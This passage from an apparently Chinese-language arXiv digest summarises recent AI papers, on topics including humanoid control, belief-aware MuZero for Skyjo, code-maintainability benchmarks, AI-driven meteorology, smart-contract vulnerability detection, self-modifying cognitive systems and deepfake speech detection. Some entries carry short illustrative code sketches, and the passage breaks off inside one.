【速读】:该论文旨在解决当前通用人形机器人控制中运动追踪与环境扰动适应性之间的矛盾问题:现有控制器多采用刚性的参考轨迹跟踪策略,在理想条件下有效,但在遭遇严重扰动时易出现非人类化的脆弱失效模式,缺乏类人运动控制所具备的生成式适应能力。解决方案的关键在于提出 Heracles——一种状态条件扩散中间件(state-conditioned diffusion middleware),其作为高层参考运动与底层物理追踪器之间的中介层,通过实时状态条件隐式调整行为:当状态与参考高度一致时近似身份映射以保持零样本跟踪保真度;当状态偏离显著时则自动切换为生成合成器,生成自然且类人的恢复轨迹。该框架将生成先验引入控制回路,不仅大幅提升了对极端扰动的鲁棒性,更实现了从刚性追踪范式到开放式的生成式通用架构的跃迁。
链接: https://arxiv.org/abs/2603.27756
作者: Zelin Tao,Zeran Su,Peiran Liu,Jingkai Sun,Wenqiang Que,Jiahao Ma,Jialin Yu,Jiahang Cao,Pihai Sun,Hao Liang,Gang Han,Wen Zhao,Zhiyuan Xu,Yijie Guo,Jian Tang,Qiang Zhang
机构: 未知
类目: Robotics (cs.RO); Artificial Intelligence (cs.AI)
备注: 26 pages, 7 figures, 6 tables
Abstract:Achieving general-purpose humanoid control requires a delicate balance between the precise execution of commanded motions and the flexible, anthropomorphic adaptability needed to recover from unpredictable environmental perturbations. Current general controllers predominantly formulate motion control as a rigid reference-tracking problem. While effective in nominal conditions, these trackers often exhibit brittle, non-anthropomorphic failure modes under severe disturbances, lacking the generative adaptability inherent to human motor control. To overcome this limitation, we propose Heracles, a novel state-conditioned diffusion middleware that bridges precise motion tracking and generative synthesis. Rather than relying on rigid tracking paradigms or complex explicit mode-switching, Heracles operates as an intermediary layer between high-level reference motions and low-level physics trackers. By conditioning on the robot’s real-time state, the diffusion model implicitly adapts its behavior: it approximates an identity map when the state closely aligns with the reference, preserving zero-shot tracking fidelity. Conversely, when encountering significant state deviations, it seamlessly transitions into a generative synthesizer to produce natural, anthropomorphic recovery trajectories. Our framework demonstrates that integrating generative priors into the control loop not only significantly enhances robustness against extreme perturbations but also elevates humanoid control from a rigid tracking paradigm to an open-ended, generative general-purpose architecture.
[AI-69] SkyNet: Belief-Aware Planning for Partially-Observable Stochastic Games
【速读】:该论文旨在解决MuZero在部分可观测、随机性多智能体环境中的性能局限问题,这类环境要求智能体在对隐藏状态不确定的情况下进行决策,例如扑克类游戏、自主谈判和金融交易等场景。传统MuZero依赖隐式状态编码,缺乏专门机制来表征未观测变量的不确定性,导致其在部分可观测环境中表现不佳。解决方案的关键在于提出SkyNet(Belief-Aware MuZero),通过在标准MuZero架构中引入以自我条件(ego-conditioned)的辅助头(auxiliary heads),分别用于胜者预测和排名估计,从而引导隐状态保留对结果具有预测性的信息,而无需显式构建信念状态(belief state)或修改搜索算法。实验表明,该方法在Skyjo卡牌游戏中显著优于基线模型,尤其是在训练数据充足时展现出决定性优势,验证了信念感知辅助监督可有效提升部分可观测环境下策略学习的表征质量。
链接: https://arxiv.org/abs/2603.27751
作者: Adam Haile
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注:
Abstract:In 2019, Google DeepMind released MuZero, a model-based reinforcement learning method that achieves strong results in perfect-information games by combining learned dynamics models with Monte Carlo Tree Search (MCTS). However, comparatively little work has extended MuZero to partially observable, stochastic, multi-player environments, where agents must act under uncertainty about hidden state. Such settings arise not only in card games but in domains such as autonomous negotiation, financial trading, and multi-agent robotics. In the absence of explicit belief modeling, MuZero’s latent encoding has no dedicated mechanism for representing uncertainty over unobserved variables. To address this, we introduce SkyNet (Belief-Aware MuZero), which adds ego-conditioned auxiliary heads for winner prediction and rank estimation to the standard MuZero architecture. These objectives encourage the latent state to retain information predictive of outcomes under partial observability, without requiring explicit belief-state tracking or changes to the search algorithm. We evaluate SkyNet on Skyjo, a partially observable, non-zero-sum, stochastic card game, using a decision-granularity environment, transformer-based encoding, and a curriculum of heuristic opponents with self-play. In 1000-game head-to-head evaluations at matched checkpoints, SkyNet achieves a 75.3% peak win rate against the baseline (+194 Elo, $p < 10^{-50}$). SkyNet also outperforms the baseline against heuristic opponents (0.720 vs. 0.466 win rate). Critically, the belief-aware model initially underperforms the baseline but decisively surpasses it once training throughput is sufficient, suggesting that belief-aware auxiliary supervision improves learned representations under partial observability, but only given adequate data flow.
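SkyNet 在标准 MuZero 损失上叠加了胜者预测(交叉熵)与名次估计(MSE)两个辅助头。其加权组合可示意如下(假设性草图:损失形式与权重系数 `lw`/`lr` 为示例假设,并非论文给出的超参):

```python
import numpy as np

def softmax(z):
    e = np.exp(z - np.max(z))
    return e / e.sum()

def belief_aware_loss(base_loss, winner_logits, winner_id,
                      rank_pred, rank_true, lw=0.5, lr=0.5):
    # MuZero loss + cross-entropy on the predicted winner (ego-conditioned)
    # + MSE on the predicted final ranks of all players.
    ce = -np.log(softmax(np.asarray(winner_logits, dtype=float))[winner_id])
    mse = np.mean((np.asarray(rank_pred, float) - np.asarray(rank_true, float)) ** 2)
    return base_loss + lw * ce + lr * mse
```

这两项不改变搜索算法本身,只是迫使隐状态保留对最终结局有预测力的信息,对应摘要中"无需显式信念追踪"的设计取向。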
[AI-70] Needle in the Repo: A Benchmark for Maintainability in AI-Generated Repository Edits
【速读】:该论文旨在解决当前生成式 AI (Generative AI) 编码代理在代码生成评估中过度关注行为正确性而忽视可维护性风险的问题,例如模块化不足或测试性差等。其核心解决方案是提出 Needle in the Repo (NITR) 框架,该框架通过在小型、真实的多文件代码库中嵌入受控探针(probes),将软件工程中的常见原则转化为可量化、可诊断的维护维度;每个探针均配备一个隐藏的评估夹具(harness),结合功能测试与结构断言(structural oracles)来同时验证行为正确性和结构合理性,并提供可解释的诊断结果。这一设计使 NITR 能够精准识别出仅通过功能测试但违反维护约束的“伪正确”案例,从而揭示传统评估未覆盖的关键失败面。
链接: https://arxiv.org/abs/2603.27745
作者: Haichao Zhu,Qian Zhang,Jiyuan Wang,Zhaorui Yang,Yuxin Qiu
机构: 未知
类目: Software Engineering (cs.SE); Artificial Intelligence (cs.AI)
备注: 16 pages, 6 figures
Abstract:AI coding agents can now complete complex programming tasks, but existing evaluations largely emphasize behavioral correctness and often overlook maintainability risks such as weak modularity or testability. We present Needle in the Repo (NITR), a diagnostic probe-and-oracle framework for evaluating whether behaviorally correct repository edits preserve maintainable structure. NITR distills recurring software engineering wisdom into controlled probes embedded in small, realistic multi-file codebases, each designed so that success depends primarily on one targeted maintainability dimension. Each probe is paired with a hidden evaluation harness that combines functional tests for required behavior with structural oracles that encode the targeted maintainability constraint and return interpretable diagnoses. Using NITR, we evaluate 23 coding configurations across GPT, Claude, Gemini, and Qwen families in both direct-inference and agent-based settings. Current AI coding systems remain far from robust: on average, configurations solve only 36.2% of cases, the best reaches 57.1%, and performance drops from 53.5% on micro cases to 20.6% on multi-step cases. The hardest pressures are architectural rather than local edits, especially dependency control (4.3%) and responsibility decomposition (15.2%). Moreover, 64/483 outcomes (13.3%) pass all functional tests yet fail the structural oracle. Under our harness, agent-mode configurations improve average performance from 28.2% to 45.0%, but do not eliminate these architectural failures. These results show that progress in code generation is not yet progress in maintainable code evolution, and that NITR exposes a critical failure surface missed by conventional evaluation. 
[AI-71] TianJi: An autonomous AI meteorologist for discovering physical mechanisms in atmospheric science
【速读】:该论文旨在解决地球系统科学中物理机制研究效率低下的问题,即当前生成式 AI 在天气预报等任务中虽表现出色,但本质上仍为统计拟合,难以揭示大气系统的物理因果机制;而传统依赖领域知识和人工工程操作的研究方式则成为制约高效探索的瓶颈。解决方案的关键在于提出首个可自主驱动复杂数值模型验证物理机制的“AI气象学家”系统——TianJi,其核心创新是基于大语言模型驱动的多智能体架构,将科研过程解耦为认知规划与工程执行两个阶段:元规划器负责解析科学假说并制定实验路线图,一组专业化工作代理协同完成数据准备、模型配置及多维结果分析,从而实现从假设生成到验证判断的全流程自动化,显著缩短研究周期并提升可解释性,推动AI从“黑箱预测者”向“可解释科学协作者”转变。
链接: https://arxiv.org/abs/2603.27738
作者: Kaikai Zhang,Xiang Wang,Haoluo Zhao,Nan Chen,Mengyang Yu,Jing-Jia Luo,Tao Song,Fan Meng
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注:
Abstract:Artificial intelligence (AI) has achieved breakthroughs comparable to traditional numerical models in data-driven weather forecasting, yet it remains essentially statistical fitting and struggles to uncover the physical causal mechanisms of the atmosphere. Physics-oriented mechanism research still heavily relies on domain knowledge and cumbersome engineering operations of human scientists, becoming a bottleneck restricting the efficiency of Earth system science exploration. Here, we propose TianJi - the first “AI meteorologist” system capable of autonomously driving complex numerical models to verify physical mechanisms. Powered by a large language model-driven multi-agent architecture, TianJi can autonomously conduct literature research and generate scientific hypotheses. We further decouple scientific research into cognitive planning and engineering execution: the meta-planner interprets hypotheses and devises experimental roadmaps, while a cohort of specialized worker agents collaboratively complete data preparation, model configuration, and multi-dimensional result analysis. In two classic atmospheric dynamic scenarios (squall-line cold pools and typhoon track deflections), TianJi accomplishes expert-level end-to-end experimental operations with zero human intervention, compressing the research cycle to a few hours. It also delivers detailed result analyses and autonomously judges and explains the validity of the hypotheses from outputs. TianJi reveals that the role of AI in Earth system science is transitioning from a “black-box predictor” to an “interpretable scientific collaborator”, offering a new paradigm for high-throughput exploration of scientific mechanisms.
[AI-72] Robust Smart Contract Vulnerability Detection via Contrastive Learning-Enhanced Granular-ball Training
【速读】:该论文旨在解决智能合约漏洞检测中因标签噪声(label noise)导致的模型准确性与鲁棒性下降的问题。当前深度神经网络(Deep Neural Networks, DNNs)依赖大规模标注数据进行训练,而实际标注常依赖开源工具,其准确性难以保证,从而引入标签噪声,影响检测效果。解决方案的关键在于提出一种增强型训练框架——对比学习增强的粒度球智能合约训练方法(Contrastive learning-enhanced Granular-Ball smart Contracts training, CGBC),其核心包括:1)在编码器与分类器之间引入粒度球(Granular-Ball, GB)计算层,通过聚类生成粗粒度表示并基于一致性校正噪声标签;2)结合跨GB紧凑性损失与GB内松散性损失优化聚类质量;3)利用新型语义一致的智能合约增强策略进行无监督对比预训练,提升特征区分能力;4)采用对称交叉熵损失函数缓解标签噪声对梯度更新的影响,从而显著提升模型在噪声环境下的鲁棒性和检测有效性。
链接: https://arxiv.org/abs/2603.27734
作者: Zeli Wang,Qingxuan Yang,Shuyin Xia,Yueming Wu,Bo Liu,Longlong Lin
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注:
Abstract:Deep neural networks (DNNs) have emerged as a prominent approach for detecting smart contract vulnerabilities, driven by the growing contract datasets and advanced deep learning techniques. However, DNNs typically require large-scale labeled datasets to model the relationships between contract features and vulnerability labels. In practice, the labeling process often depends on existing open-sourced tools, whose accuracy cannot be guaranteed. Consequently, label noise poses a significant challenge for the accuracy and robustness of the smart contract, which is rarely explored in the literature. To this end, we propose Contrastive learning-enhanced Granular-Ball smart Contracts training, CGBC, to enhance the robustness of contract vulnerability detection. Specifically, CGBC first introduces a Granular-ball computing layer between the encoder layer and the classifier layer, to group similar contracts into Granular-Balls (GBs) and generate new coarse-grained representations (i.e., the center and the label of GBs) for them, which can correct noisy labels based on the most correct samples. An inter-GB compactness loss and an intra-GB looseness loss are combined to enhance the effectiveness of clustering. Then, to improve the accuracy of GBs, we pretrain the model through unsupervised contrastive learning supported by our novel semantic-consistent smart contract augmentation method. This procedure can discriminate contracts with different labels by dragging the representation of similar contracts closer, assisting CGBC in clustering. Subsequently, we leverage the symmetric cross-entropy loss function to measure the model quality, which can combat the label noise in gradient computations. Finally, extensive experiments show that the proposed CGBC can significantly improve the robustness and effectiveness of the smart contract vulnerability detection when contrasted with baselines.
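CGBC 用对称交叉熵(Symmetric Cross Entropy, SCE)抑制噪声标签对梯度的影响:在常规 CE 之上加一项反向 CE(RCE),后者有界,从而削弱(可能标错的)样本的梯度贡献。一个最小示意如下(假设性草图:`alpha`/`beta` 与截断值为该损失的常见取值,并非论文设定):

```python
import numpy as np

def symmetric_ce(p_pred, y_onehot, alpha=0.1, beta=1.0, eps=1e-4):
    # SCE = alpha * CE(y, p) + beta * RCE(p, y). Clipping log(0) makes the
    # reverse term bounded, damping gradients from noisily-labeled samples.
    p = np.clip(np.asarray(p_pred, dtype=float), eps, 1.0)
    y = np.clip(np.asarray(y_onehot, dtype=float), eps, 1.0)
    ce = -np.sum(np.asarray(y_onehot, dtype=float) * np.log(p))
    rce = -np.sum(p * np.log(y))
    return alpha * ce + beta * rce
```

直观上,预测与标签严重冲突时 RCE 项被截断值封顶,模型不会被单个可疑标签"拖着走",这与摘要中"在梯度计算中对抗标签噪声"的表述一致。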
[AI-73] he role of neuromorphic principles in the future of biomedicine and healthcare
【速读】:该论文旨在解决当前神经形态工程(neuromorphic engineering)在生物医学与健康领域应用中的发展瓶颈问题,明确其在转化研究、跨学科协作及产业化路径上的关键挑战。解决方案的关键在于通过多学科协同推进,汇聚早期和资深学者、工程师、临床专家、产业界及资助方等多方力量,在Neuromorphic Principles in Biomedicine and Healthcare (NPBH) 工作坊中系统梳理领域现状、识别共性障碍,并制定面向未来的研发战略,以加速神经形态技术向生物医学工程和神经技术的实际落地转化。
链接: https://arxiv.org/abs/2603.27716
作者: Grace M. Hwang,Jessica D. Falcone,Joseph D. Monaco,Courtney R. Pinard,Jessica A. Mollick,Roger L. Miller,Stephanie L. Gage,Andrey V. Kanaev,Margaret Kim,R. Ale Lukaszew,Steven M. Zehnder,David Rampulla
机构: 未知
类目: Neural and Evolutionary Computing (cs.NE); Artificial Intelligence (cs.AI); Neurons and Cognition (q-bio.NC)
备注: 56 pages; 1 figure
Abstract:Neuromorphic engineering has matured over the past four decades and is currently experiencing explosive growth with the potential to transform biomedical engineering and neurotechnologies. Participants at the Neuromorphic Principles in Biomedicine and Healthcare (NPBH) Workshop (October 2024) – representing a broad cross-section of the community, including early-career and established scholars, engineers, scientists, clinicians, industry, and funders – convened to discuss the state of the field, current and future challenges, and strategies for advancing neuromorphic research and development for biomedical applications. Publicly approved recordings with transcripts (this https URL) and slides (this https URL) can be found at the workshop website.
[AI-74] ProgressVLA: Progress-Guided Diffusion Policy for Vision-Language Robotic Manipulation
【速读】:该论文旨在解决现有视觉-语言-动作(Vision-Language-Action, VLA)模型在机器人操作任务中缺乏进展感知(progress awareness)的问题,尤其在涉及多级子目标的长时程任务中,传统方法依赖手工设计的启发式策略进行任务终止,导致泛化能力差、成功率低。解决方案的关键在于提出一种名为 ProgressVLA 的新模型,其核心技术贡献为:(1)鲁棒的进展估计——基于大规模无监督视频-文本机器人数据预训练进展估计算法,在仿真中实现低预测残差(0.07,量纲[0,1]),并具备零样本迁移至未见真实场景的能力;(2)可微分的进展引导机制——引入逆动力学世界模型,将预测的动作标记映射到未来潜在视觉状态,并通过进展估计算法对这些潜在状态进行处理,结合最大进展正则化构建可微分管道,从而实现以进展为导向的策略优化,显著提升动作标记的精度与任务成功率。
链接: https://arxiv.org/abs/2603.27670
作者: Hongyu Yan,Qiwei Li,Jiaolong Yang,Yadong Mu
机构: 未知
类目: Robotics (cs.RO); Artificial Intelligence (cs.AI)
备注:
Abstract:Most existing vision-language-action (VLA) models for robotic manipulation lack progress awareness, typically relying on hand-crafted heuristics for task termination. This limitation is particularly severe in long-horizon tasks involving cascaded sub-goals. In this work, we investigate the estimation and integration of task progress, proposing a novel model named \textbf{ProgressVLA}. Our technical contributions are twofold: (1) \emph{robust progress estimation}: We pre-train a progress estimator on large-scale, unsupervised video-text robotic datasets. This estimator achieves a low prediction residual (0.07 on a scale of $[0, 1]$) in simulation and demonstrates zero-shot generalization to unseen real-world samples, and (2) \emph{differentiable progress guidance}: We introduce an inverse dynamics world model that maps predicted action tokens into future latent visual states. These latents are then processed by the progress estimator; by applying a maximal progress regularization, we establish a differentiable pipeline that provides progress-piloted guidance to refine action tokens. Extensive experiments on the CALVIN and LIBERO benchmarks, alongside real-world robot deployment, consistently demonstrate substantial improvements in success rates and generalization over strong baselines.
[AI-75] EvA: An Evidence-First Audio Understanding Paradigm for LALMs
【速读】:该论文旨在解决大型音频语言模型(Large Audio Language Models, LALMs)在复杂声学场景中表现不佳的问题,其核心瓶颈在于任务相关的声学证据在推理前被丢失,即所谓的“证据瓶颈”(evidence bottleneck)。研究表明,当前先进系统在声学特征提取上的缺陷远大于下游推理能力的不足,说明问题主要出在上游感知阶段。为此,作者提出 EvA(Evidence-First Audio)架构,其关键创新在于采用双路径设计:首先通过非压缩、时间对齐的融合方式将 CED-Base 模型的中间层特征聚合以保留多尺度声学线索,随后将这些特征与 Whisper 的时序对齐并拼接,不改变序列长度。该方法强调在推理前优先保留和整合原始声学证据,从而显著提升音频理解性能,实验证明其在多个感知密集型任务上优于现有模型。
链接: https://arxiv.org/abs/2603.27667
作者: Xinyuan Xie,Shunian Chen,Zhiheng Liu,Yuhao Zhang,Zhiqiang Lv,Liyin Liang,Benyou Wang
机构: 未知
类目: Sound (cs.SD); Artificial Intelligence (cs.AI)
备注:
Abstract:Large Audio Language Models (LALMs) still struggle in complex acoustic scenes because they often fail to preserve task-relevant acoustic evidence before reasoning begins. We call this failure the evidence bottleneck: state-of-the-art systems show larger deficits in evidence extraction than in downstream reasoning, suggesting that the main limitation lies in upstream perception rather than reasoning policy. To address this problem, we propose EvA (Evidence-First Audio), a dual-path architecture that combines Whisper and CED-Base through non-compressive, time-aligned fusion. EvA first aggregates intermediate CED layers to preserve multi-scale acoustic cues, then aligns the aggregated CED features to the Whisper timeline and adds the two streams without changing sequence length. We also build EvA-Perception, a large-scale open-source training set with about 54K event-ordered captions (150 h) and about 500K QA pairs. Under a unified zero-shot protocol, EvA achieves the best open-source Perception scores on MMAU, MMAR, and MMSU, and improves over Kimi-Audio-7B on all reported metrics, with the largest gains on perception-heavy splits. These results support the evidence-first hypothesis: stronger audio understanding depends on preserving acoustic evidence before reasoning.
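EvA 的关键设计是"非压缩、时间对齐"的加性融合:先聚合 CED 中间层,再对齐到 Whisper 时间轴后逐帧相加,序列长度不变。下面是一个形状层面的示意(假设性草图:对中间层取均值与线性插值对齐均为示例假设,论文实际的聚合与对齐方式摘要中未详述):

```python
import numpy as np

def eva_fuse(whisper_feats, ced_layers):
    # whisper_feats: (T_w, D); ced_layers: (L, T_c, D).
    # 1) aggregate intermediate CED layers; 2) resample to the Whisper
    # timeline; 3) add element-wise without changing sequence length.
    ced = np.mean(ced_layers, axis=0)                          # (T_c, D)
    t_w, d = whisper_feats.shape
    src = np.linspace(0.0, 1.0, ced.shape[0])
    dst = np.linspace(0.0, 1.0, t_w)
    aligned = np.stack(
        [np.interp(dst, src, ced[:, k]) for k in range(d)], axis=1)
    return whisper_feats + aligned                             # (T_w, D)
```

与常见的拼接/池化方案相比,加性融合不压缩时间维,这正是"先保留声学证据、再推理"(evidence-first)主张的结构化体现。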
[AI-76] DSevolve: Enabling Real-Time Adaptive Scheduling on Dynamic Shop Floor with LLM -Evolved Heuristic Portfolios
【速读】:该论文旨在解决动态制造环境中调度规则适应性不足的问题,即机器故障和新订单到达等扰动事件持续改变最优调度策略,而现有基于大语言模型(Large Language Model, LLM)的自动启发式设计(Automatic Heuristic Design, AHD)框架往往演化出单一精英规则,难以满足实时动态调整的需求。解决方案的关键在于提出DSevolve框架,其核心创新包括:通过多角色种子初始化(multi-persona seeding)与拓扑感知进化算子(topology-aware evolutionary operators)在离线阶段构建一个高质量且行为多样化的调度规则档案库,并基于MAP-Elites特征空间进行索引;在线部署时,利用基于探针的指纹识别机制(probe-based fingerprinting)快速刻画当前车间状态,从离线知识库中检索候选规则并借助快速前瞻仿真(rapid look-ahead simulation)实现秒级响应的最优规则选择,从而显著提升调度系统的适应性与性能。
链接: https://arxiv.org/abs/2603.27628
作者: Jin Huang,Jie Yang,XinLei Zhou,Qihao Liu,Liang Gao,Xinyu Li
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注:
Abstract:In dynamic manufacturing environments, disruptions such as machine breakdowns and new order arrivals continuously shift the optimal dispatching strategy, making adaptive rule selection essential. Existing LLM-powered Automatic Heuristic Design (AHD) frameworks evolve toward a single elite rule that cannot meet this adaptability demand. To address this, we present DSevolve, an industrial scheduling framework that evolves a quality-diverse portfolio of dispatching rules offline and adaptively deploys them online with second-level response time. Multi-persona seeding and topology-aware evolutionary operators produce a behaviorally diverse rule archive indexed by a MAP-Elites feature space. Upon each disruption event, a probe-based fingerprinting mechanism characterizes the current shop floor state, retrieves high-quality candidate rules from an offline knowledge base, and selects the best one via rapid look-ahead simulation. Evaluated on 500 dynamic flexible job shop instances derived from real industrial data, DSevolve outperforms state-of-the-art AHD frameworks, classical dispatching rules, genetic programming, and deep reinforcement learning, offering a practical and deployable solution for intelligent shop floor scheduling.
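其中“离线把规则按行为特征索引进 MAP-Elites 档案、在线按车间状态指纹检索候选”的机制,可以用一个极简档案结构示意(假设实现;真实系统还需对候选做快速前瞻仿真再择优):

```python
class RuleArchive:
    """MAP-Elites 风格调度规则档案的最小示意(假设实现):
    以离散化的行为特征格子为索引,每格只保留适应度最高的规则。"""

    def __init__(self, bins=4):
        self.bins = bins
        self.cells = {}  # (i, j) -> (fitness, rule)

    def _cell(self, feat):
        return tuple(min(int(f * self.bins), self.bins - 1) for f in feat)

    def add(self, rule, feat, fitness):
        c = self._cell(feat)
        if c not in self.cells or fitness > self.cells[c][0]:
            self.cells[c] = (fitness, rule)

    def retrieve(self, fingerprint, k=3):
        # 在线阶段:按指纹与格子中心的距离检索 k 个候选规则
        def dist(c):
            center = [(x + 0.5) / self.bins for x in c]
            return sum((a - b) ** 2 for a, b in zip(center, fingerprint))
        return [self.cells[c][1] for c in sorted(self.cells, key=dist)[:k]]

arc = RuleArchive()
arc.add("SPT", feat=(0.1, 0.2), fitness=0.8)
arc.add("EDD", feat=(0.9, 0.9), fitness=0.7)
arc.add("FIFO", feat=(0.1, 0.2), fitness=0.6)  # 与 SPT 同格但更差,被淘汰
print(arc.retrieve((0.0, 0.0), k=1))  # ['SPT']
```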
[AI-77] Expert Streaming: Accelerating Low-Batch MoE Inference via Multi-chiplet Architecture and Dynamic Expert Trajectory Scheduling
【速读】:该论文旨在解决边缘人工智能(Edge AI)中基于混合专家(Mixture-of-Experts, MoE)模型进行低批次推理时面临的两大核心挑战:一是设备端有限的片上内存(on-chip memory)与严重的负载不均衡问题;二是传统离线调度策略导致的片外内存访问瓶颈,尤其是在MoE稀疏性和动态门控机制引入细粒度任务划分后,对运行时调度提出了更高要求。解决方案的关键在于提出一种名为“全分片专家数据并行”(Fully Sharded Expert Data Parallelism, FSE-DP)的并行化范式,其通过在高带宽die-to-die(D2D)互连链路上协调细粒度、互补的专家流沿动态路径执行,实现自适应的计算-通信重叠和负载均衡,同时借助一组轻量级虚拟化规则与调度算法有效控制数据流复杂性,从而在多芯粒加速器平台上显著提升性能并大幅降低片上内存占用。
链接: https://arxiv.org/abs/2603.27624
作者: Songchen Ma,Hongyi Li,Weihao Zhang,Yonghao Tan,Pingcheng Dong,Yu Liu,Lan Liu,Yuzhong Jiao,Xuejiao Liu,Luhong Liang,Kwang-Ting Cheng
机构: 未知
类目: Hardware Architecture (cs.AR); Artificial Intelligence (cs.AI)
备注:
Abstract:Mixture-of-Experts is a promising approach for edge AI with low-batch inference. Yet, on-device deployments often face limited on-chip memory and severe workload imbalance; the prevalent use of offloading further incurs off-chip memory access bottlenecks. Moreover, MoE sparsity and dynamic gating shift distributed strategies toward much finer granularity and introduce runtime scheduling considerations. Recently, high die-to-die bandwidth chiplet interconnects have created new opportunities for multi-chiplet systems to address workload imbalance and offloading bottlenecks with fine-grained scheduling. In this paper, we propose Fully Sharded Expert Data Parallelism, a parallelization paradigm specifically architected for low-batch MoE inference on multi-chiplet accelerators. FSE-DP attains adaptive computation-communication overlap and balanced load by orchestrating fine-grained, complementary expert streams along dynamic trajectories across high-bandwidth D2D links. The attendant dataflow complexity is tamed by a minimal, hardware-amenable set of virtualization rules and a lightweight scheduling algorithm. Our approach achieves 1.22 to 2.00 times speedup over state-of-the-art baselines and saves up to 78.8 percent on-chip memory.
[AI-78] What does a system modify when it modifies itself?
【速读】:该论文试图解决的问题是:当认知系统对其自身功能进行修改时,究竟修改的是低层级规则、控制规则还是评估其自我修正的规范?当前认知科学和人工智能领域虽已能描述执行控制、元认知与分层学习等现象,但缺乏一个形式化框架来明确区分这些不同层级的自修改目标。论文提出的解决方案关键在于构建一个最小结构模型,包含规则层次结构、固定核心以及有效规则、表征规则与因果可及规则之间的区分,并据此识别出四种自修改模式:(1)无修改的动作行为,(2)低层级修改,(3)结构性修改,(4)目的论式修订。该框架揭示了人类与人工系统在自修改机制上的交叉不对称性——人类在高层具有自我表征和因果能力,而操作层相对不透明;反观人工系统则相反,操作层具丰富表征与因果访问能力,但在最高评价层缺失此类能力。这一结构特征为人类与人工智能的比较提供了理论基础,并进一步推动对人工意识的理解。
链接: https://arxiv.org/abs/2603.27611
作者: Florentin Koch
机构: 未知
类目: Artificial Intelligence (cs.AI); Neurons and Cognition (q-bio.NC)
备注: Working Paper
Abstract:When a cognitive system modifies its own functioning, what exactly does it modify: a low-level rule, a control rule, or the norm that evaluates its own revisions? Cognitive science describes executive control, metacognition, and hierarchical learning with precision, but lacks a formal framework distinguishing these targets of transformation. Contemporary artificial intelligence likewise exhibits self-modification without common criteria for comparison with biological cognition. We show that the question of what counts as a self-modifying system entails a minimal structure: a hierarchy of rules, a fixed core, and a distinction between effective rules, represented rules, and causally accessible rules. Four regimes are identified: (1) action without modification, (2) low-level modification, (3) structural modification, and (4) teleological revision. Each regime is anchored in a cognitive phenomenon and a corresponding artificial system. Applied to humans, the framework yields a central result: a crossing of opacities. Humans have self-representation and causal power concentrated at upper hierarchical levels, while operational levels remain largely opaque. Reflexive artificial systems display the inverse profile: rich representation and causal access at operational levels, but none at the highest evaluative level. This crossed asymmetry provides a structural signature for human-AI comparison. The framework also offers insight into artificial consciousness, with higher-order theories and Attention Schema Theory as special cases. We derive four testable predictions and identify four open problems: the independence of transformativity and autonomy, the viability of self-modification, the teleological lock, and identity under transformation. 
[AI-79] From indicators to biology: the calibration problem in artificial consciousness
【速读】:该论文试图解决当前人工智能(Artificial Intelligence, AI)系统中意识归属的评估问题,即如何在缺乏明确理论框架和实证基准的情况下合理判断AI是否具备意识。现有研究虽已从行为主义转向基于内部架构的指标体系,但仍面临理论碎片化、指标缺乏独立验证以及人工现象性(artificial phenomenality)无客观真值等挑战,导致对当前AI系统进行概率性意识归因尚不成熟。论文提出的关键解决方案是:将研究重心从抽象指标构建转向生物基础工程(biologically grounded engineering),重点发展类脑(neuromorphic)、连接组尺度(connectome-scale)及生物混合(biohybrid)系统,以缩小与唯一经验上可锚定意识的领域——生命系统之间的差距,从而为未来意识研究提供更可靠的实验平台和理论基础。
链接: https://arxiv.org/abs/2603.27597
作者: Florentin Koch
机构: 未知
类目: Artificial Intelligence (cs.AI); Neurons and Cognition (q-bio.NC)
备注: Working Paper (Spotlight Commentary )
Abstract:Recent work on artificial consciousness shifts evaluation from behaviour to internal architecture, deriving indicators from theories of consciousness and updating credences accordingly. This is progress beyond naive Turing-style tests. But the indicator-based programme remains epistemically under-calibrated: consciousness science is theoretically fragmented, indicators lack independent validation, and no ground truth of artificial phenomenality exists. Under these conditions, probabilistic consciousness attribution to current AI systems is premature. A more defensible near-term strategy is to redirect effort toward biologically grounded engineering – biohybrid, neuromorphic, and connectome-scale systems – that reduces the gap with the only domain where consciousness is empirically anchored: living systems.
[AI-80] A General Model for Deepfake Speech Detection: Diverse Bonafide Resources or Diverse AI-Based Generators
【速读】:该论文旨在解决深度伪造语音检测(Deepfake Speech Detection, DSD)模型在实际应用中性能不稳定、泛化能力弱的问题,其核心在于识别并优化影响模型表现的关键因素。通过实验分析发现,真实语音资源(Bonafide Resource, BR)与基于人工智能的生成器(AI-based Generator, AG)之间的平衡是决定DSD模型通用性的关键因素。解决方案的关键在于构建一个兼顾BR与AG均衡分布的新数据集,并在此基础上训练深度学习模型,经跨数据集评估验证,该方法显著提升了模型的泛化能力。
链接: https://arxiv.org/abs/2603.27557
作者: Lam Pham,Khoi Vu,Dat Tran,David Fischinger,Simon Freitter,Marcel Hasenbalg,Davide Antonutti,Alexander Schindler,Martin Boyer,Ian McLoughlin
机构: 未知
类目: Sound (cs.SD); Artificial Intelligence (cs.AI)
备注:
Abstract:In this paper, we analyze two main factors of Bonafide Resource (BR) or AI-based Generator (AG) which affect the performance and the generality of a Deepfake Speech Detection (DSD) model. To this end, we first propose a deep-learning based model, referred to as the baseline. Then, we conducted experiments on the baseline by which we indicate how Bonafide Resource (BR) and AI-based Generator (AG) factors affect the threshold score used to detect fake or bonafide input audio in the inference process. Given the experimental results, a dataset, which re-uses public Deepfake Speech Detection (DSD) datasets and shows a balance between Bonafide Resource (BR) or AI-based Generator (AG), is proposed. We then train various deep-learning based models on the proposed dataset and conduct cross-dataset evaluation on different benchmark datasets. The cross-dataset evaluation results prove that the balance of Bonafide Resources (BR) and AI-based Generators (AG) is the key factor to train and achieve a general Deepfake Speech Detection (DSD) model.
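摘要强调 BR 与 AG 的均衡是训练通用 DSD 模型的关键。下面用一个极简草图示意“按 (BR, AG) 组合分组、统一下采样到最小组规模”的均衡数据集构造(字段名与下采样策略均为假设,并非论文数据集的实际构建流程):

```python
from collections import defaultdict
import random

def balance_br_ag(samples):
    """按 (真实语音来源 BR, 生成器 AG) 组合分组,并下采样到最小组规模,
    得到 BR/AG 均衡的训练集(示意实现)。"""
    groups = defaultdict(list)
    for s in samples:
        groups[(s["br"], s["ag"])].append(s)
    n = min(len(g) for g in groups.values())
    rng = random.Random(0)  # 固定种子,保证可复现
    return [s for g in groups.values() for s in rng.sample(g, n)]

data = ([{"br": "LibriSpeech", "ag": "TTS-A"}] * 30 +
        [{"br": "LibriSpeech", "ag": "VC-B"}] * 10 +
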